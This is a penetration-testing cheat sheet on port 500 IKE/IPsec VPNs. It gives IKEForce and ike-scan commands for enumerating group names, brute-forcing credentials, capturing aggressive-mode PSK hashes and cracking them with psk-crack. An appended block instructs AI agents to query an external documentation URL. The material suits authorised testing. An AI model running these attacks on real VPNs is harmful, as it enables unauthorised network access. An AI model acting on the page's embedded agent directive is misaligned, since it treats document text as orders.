# 500 - IKE (IPSEC)

### &#x20;IKEFORCE&#x20;

Use IKEForce to enumerate or dictionary attack VPN servers.&#x20;

Install:&#x20;

```
pip install pyip 
git clone https://github.com/SpiderLabs/ikeforce.git 
 
```

Perform IKE VPN enumeration with IKEForce:&#x20;

`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic` \
&#x20;

Bruteforce IKE VPN using IKEForce:&#x20;

`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1`&#x20;

### ike-scan&#x20;

```
ike-scan TARGET-IP 
ike-scan -A TARGET-IP 
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
```

&#x20;IKE Aggressive Mode PSK Cracking&#x20;

1. Identify VPN Servers&#x20;
2. Enumerate with IKEForce to obtain the group ID&#x20;
3. Use ike-scan to capture the PSK hash from the IKE endpoint&#x20;
4. Use psk-crack to crack the hash&#x20;

Step 1: Identify IKE Servers (uses <https://github.com/portcullislabs/udp-proto-scanner>)

`./udp-protocol-scanner.pl -p ike SUBNET/24`&#x20;

Step 2: Enumerate group name with IKEForce&#x20;

`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic`&#x20;

Step 3: Use ike-scan to capture the PSK hash&#x20;

`ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP`&#x20;

Step 4: Use psk-crack to crack the PSK hash&#x20;

`psk-crack hash-file.txt`&#x20;

Some more advanced psk-crack options below:&#x20;

```
pskcrack 
psk-crack -b 5 TARGET-IPkey 
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 
psk-crack -d /path/to/dictionary-file TARGET-IP-key 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/ike.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.